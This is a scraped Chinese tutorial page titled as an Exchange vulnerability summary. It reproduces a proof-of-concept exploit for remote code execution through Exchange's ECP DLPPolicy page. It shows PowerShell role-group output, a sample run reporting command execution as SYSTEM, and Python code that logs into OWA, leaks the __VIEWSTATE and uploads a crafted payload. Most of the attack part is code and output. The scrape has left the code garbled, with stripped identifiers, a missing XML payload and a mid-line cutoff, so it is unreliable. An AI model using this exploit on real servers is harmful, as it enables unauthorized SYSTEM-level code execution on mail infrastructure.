Exchange漏洞总结

系统教程720 更新时间：2026-04-04 06:48:40

2024年2月7日发(作者：)

Name AssignedRoles RoleAssignments ManagedBydlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {/Microsoft Exchange Security Groups/Organization Management, /Users/test}[PS] C:Windowssystem32>Get-RoleGroup "dlp users" | Format-ListRunspaceId : 098e1140-30e3-4144-8028-2174fdb43b85ManagedBy : {/Microsoft Exchange Security Groups/Organization Management, /Users/test}RoleAssignments : {Data Loss Prevention-dlp users}Roles : {Data Loss Prevention}DisplayName :ExternalDirectoryObjectId :Members : {/Users/Harry Mull}SamAccountName : dlp usersDescription :RoleGroupType : StandardLinkedGroup :Capabilities : {}LinkedPartnerGroupId :LinkedPartnerOrganizationId :Identity : /Microsoft Exchange Security Groups/dlp usersIsValid : TrueExchangeVersion : 0.10 (14.0.100.0)Name : dlp usersDistinguishedName : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=comGuid : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6ObjectCategory : /Configuration/Schema/GroupObjectClass : {top, group}WhenChanged : 6/12/2020 11:29:31 PMWhenCreated : 6/12/2020 11:29:31 PMWhenChangedUTC : 6/12/2020 3:29:31 PMWhenCreatedUTC : 6/12/2020 3:29:31 PMOrganizationId :Id : /Microsoft Exchange Security Groups/dlp usersOriginatingServer : ectState : ChangedExample:researcher@incite:~$ ./(+) usage: ./

(+) eg: ./ 192.168.75.142 harrym@:user123### mspaintresearcher@incite:~$ ./ 192.168.75.142 harrym@:user123### mspaint(+) logged in as harrym@(+) found the __viewstate: /wEPDwUILTg5MDAzMDFkZFAeyPS7/eBJ4lPNRNPBjm8QiWLWnirQ1vsGlSyjVxa5(+) executed mspaint as SYSTEM!"""import reimport sysimport randomimport stringimport urllib3import e_warnings(reRequestWarning)def random_string(str_len=8):letters = _lowercasereturn ''.join((letters) for i in range(str_len))def get_xml(c):return """4si""" % cdef trigger_rce(t, s, vs, cmd):f = {'__VIEWSTATE': (None, vs),'ctl00$ResultPanePlaceHolder$senderBtn': (None, "ResultPanePlaceHolder_ButtonsPanel_btnNext"),'ctl00$ResultPanePlaceHolder$contentContainer$name': (None, random_string()),'ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl': ("", get_xml(cmd)),}r = ("%s/ecp/DLPPolicy/" % t, files=f, verify=False)assert _code == 200, "(-) failed to trigger rce!"def leak_viewstate(t, s):r = ("%s/ecp/DLPPolicy/" % t, verify=False)match = ("", )assert match != None, "(-) couldn't leak the __viewstate!"return (1)def log_in(t, usr, pwd):s = n()d = {"destination": "%s/owa" % t,"flags": "","username": usr,"password": pwd}("%s/owa/" % t, data=d, verify=False)assert (name='X-OWA-CANARY') != None, "(-) couldn't leak the csrf canary!"return sdef main(t, usr, pwd, cmd):s = log_in(t, usr, pwd)print("(+) logged in as %s" % usr)vs = leak_viewstate(t, s)print("(+) found the __viewstate: %s" % vs)trigger_rce(t, s, vs, cmd)print("(+) executed %s as SYSTEM!" % cmd)if name == 'main':if len() != 4:print("(+) usage: %s " % [0])print("(+) eg: %s 192.168.75.142 harrym@:user123### mspaint" % [0])(-1)trgt = [1]assert ":" in [2], "(-) you need a user and password!"usr = [2].split("

本文发布于:2024-02-07，感谢您对本站的认可！

本文链接:https://www.fzithome.com/xitong/1707265904a247863.html

Exchange漏洞总结

发布评论取消回复

最近发表

相关推荐

标签列表

Exchange漏洞总结

发布评论 取消回复

最近发表

相关推荐

标签列表

发布评论取消回复